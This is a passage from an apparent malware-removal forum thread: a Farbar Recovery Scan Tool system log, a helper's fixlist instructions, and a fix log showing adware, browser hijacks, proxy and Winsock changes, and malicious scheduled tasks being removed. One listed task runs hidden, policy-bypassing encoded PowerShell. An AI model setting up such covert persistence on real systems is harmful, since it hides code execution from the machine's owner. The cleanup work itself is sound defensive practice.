HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DNS Servers: 208.87.151.17 - 208.87.151.16
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 0) (EnableLUA: 1)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "BTMTrayAgent"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "BrowserAppCoreService"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "AvastUI.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_DF36D0F5D36790FB776196B8BD1F923B"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "Advanced SystemCare 8"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{3358EEB9-BF63-4965-BB07-5D87F8455602}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{24B1F9F1-7C3F-41AA-A61E-0509379FACD8}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{1C03B25A-7B58-455E-9B0B-E52E038D3A25}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{D776EB9A-C2A3-41DE-BC72-EFF3929CC640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{7D3C883A-AEBC-4F58-991D-26810ACBFD9A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C81A2B31-CC74-4C27-A3FF-2BACD2DD09C3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{B861BA79-6EB3-4518-85BA-3C4F495C531B}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{8A96865D-D43C-464C-B756-000B93387C90}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse

==================== Restore Points =========================

09-12-2015 13:27:06 Windows Update
17-12-2015 20:05:00 Scheduled Checkpoint
25-12-2015 18:53:48 Scheduled Checkpoint
28-12-2015 23:12:21 PCAcceleratePro restore point
29-12-2015 00:03:18 Restore Operation
29-12-2015 16:00:38 Windows Modules Installer

==================== Faulty Device Manager Devices =============
 
==================== Event log errors: =========================

Application errors:
==================
Error: (01/05/2016 04:51:26 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

Error: (12/29/2015 05:15:24 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

Error: (12/29/2015 05:06:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_PNRPsvc, version: 6.3.9600.17415, time stamp: 0x54504177
Faulting module name: ntdll.dll, version: 6.3.9600.18146, time stamp: 0x5650b9bb
Exception code: 0xc0000005
Fault offset: 0x000000000003dcfe
Faulting process id: 0x16b8
Faulting application start time: 0xsvchost.exe_PNRPsvc0
Faulting application path: svchost.exe_PNRPsvc1
Faulting module path: svchost.exe_PNRPsvc2
Report Id: svchost.exe_PNRPsvc3
Faulting package full name: svchost.exe_PNRPsvc4
Faulting package-relative application ID: svchost.exe_PNRPsvc5

Error: (12/29/2015 04:40:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: CHOCOYAUTJA)
Description: Activation of app windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel failed with error: -2144927151 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/29/2015 04:27:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x1374
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3
Faulting package full name: mbam.exe4
Faulting package-relative application ID: mbam.exe5

Error: (12/29/2015 04:26:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x132c
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3
Faulting package full name: mbam.exe4
Faulting package-relative application ID: mbam.exe5

Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\Users\">.

Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\ProgramData\Microsoft\Windows\Start Menu\">.

Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)

Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)


System errors:
=============
Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (01/05/2016 04:50:12 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} because another computer on the network has the same name. The server could not start.

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The WajaNetEn Monitor service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Update Simple for You service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SushiLeadsUpdaterService service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network Protocols Adapter service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Advanced SystemCare Service 8 service failed to start due to the following error:
%%2

Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.


CodeIntegrity:
===================================
Date: 2016-01-05 17:09:53.308
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Robo\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-05 17:02:18.858
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-05 16:48:30.085
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 17:12:39.077
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:50:33.362
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:49:14.547
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:49:14.406
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:35:20.347
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 14:36:36.069
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 14:29:07.156
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
Percentage of memory in use: 31%
Total physical RAM: 6024.96 MB
Available physical RAM: 4155.91 MB
Total Virtual: 6984.96 MB
Available Virtual: 4856.89 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:920.08 GB) (Free:678.4 GB) NTFS
Drive d: (TRAVELDRIVE) (Removable) (Total:7.2 GB) (Free:2.74 GB) FAT32
Drive x: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.29 GB) NTFS
Drive y: (PBR Image) (Fixed) (Total:10.05 GB) (Free:0.71 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5AA0DE3C)

Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.2 GB) (Disk ID: BF9CEC9C)
Partition 1: (Not Active) - (Size=7.2 GB) - (Type=0C)

==================== End of Addition.txt ============================
 
Uninstall the following unwanted programs:

Pool Component
Setup


Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

After restart see if you can connect.
 

Attachments

  • fixlist.txt
Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by hersheychoco9 (2016-01-05 20:30:10) Run:1
Running from D:\Utilities
Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
() C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
C:\Users\hersheychoco9\AppData\Local\BrowserAir
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
RemoveProxy:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml
FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
S2 NetprotAdp; no ImagePath
S2 SushiLeadsUpdaterService; no ImagePath
S2 Update Simple for You; no ImagePath
S2 WajaNetEn Monitor; no ImagePath
S3 WsDrvInst; no ImagePath
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
S1 cherimoya; system32\drivers\cherimoya.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]
2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp
Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Seventh
Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
C:\Program Files (x86)\OLBPre
Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Sixth
Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
C:\PROGRA~1\SHOPPE~1
C:\PROGRA~1\SHOPPE~1\Osifch.bat
Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION

Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
C:\Users\hersheychoco9\AppData\Roaming\Genius


*****************

[5112] C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe => process closed successfully.
C:\Users\hersheychoco9\AppData\Local\BrowserAir => moved successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ezvtum => value removed successfully
C:\Users\hersheychoco9\AppData\Local\ezvtum.dll => moved successfully
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4d6de65c-5455-11e4-825b-a0886955d281}" => key removed successfully
HKCR\CLSID\{4d6de65c-5455-11e4-825b-a0886955d281} => key not found.
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{65359199-e247-11e4-828b-a0886955d281}" => key removed successfully
HKCR\CLSID\{65359199-e247-11e4-828b-a0886955d281} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully

========= RemoveProxy: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6EB44F16-E471-4C00-BC7C-49D2839C991D}" => key removed successfully
HKCR\CLSID\{6EB44F16-E471-4C00-BC7C-49D2839C991D} => key not found.
Firefox "homepage" removed successfully
Firefox SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)"); removed successfully
Firefox DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)"); removed successfully
Firefox "Keyword.URL" removed successfully
Firefox "newtab" removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml => moved successfully
"C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml" => not found.
HKLM\Software\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\jid1-xNAj4KGyf5wyhg@jetpack => value removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gihfmmedoddijgnhkgfgnkeohkpbipol" => key removed successfully
NetprotAdp => service removed successfully
SushiLeadsUpdaterService => service removed successfully
Update Simple for You => service removed successfully
WajaNetEn Monitor => service removed successfully
WsDrvInst => service removed successfully
BAPIDRV => service removed successfully
cherimoya => service removed successfully
EagleX64 => service removed successfully
iscFlash => service removed successfully
PCDSRVC{3B54B31B-D06B6431-06020200}_0 => service removed successfully
X6va029 => service removed successfully
{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64 => service removed successfully
"C:\Users\hersheychoco9\AppData\Local\BrowserAir" => not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean => moved successfully
C:\Program Files (x86)\DailyPCClean => moved successfully
C:\Users\hersheychoco9\Documents\DailyPCClean => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean => moved successfully
C:\Program Files (x86)\Roboscan_IS_Free.exe => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log => moved successfully
"C:\Users\hersheychoco9\AppData\Local\ezvtum.dll" => not found.
C:\Users\hersheychoco9\AppData\Local\recently-used.xbel => moved successfully
C:\Users\hersheychoco9\AppData\Local\uninstall.exe => moved successfully
C:\ProgramData\DP45977C.lfl => moved successfully
C:\ProgramData\tempimage.bmp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
C:\Windows\System32\Tasks\Pool Component => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component" => key removed successfully
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
C:\Windows\System32\Tasks\IBUpd2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
C:\Windows\System32\Tasks\Seventh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Seventh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
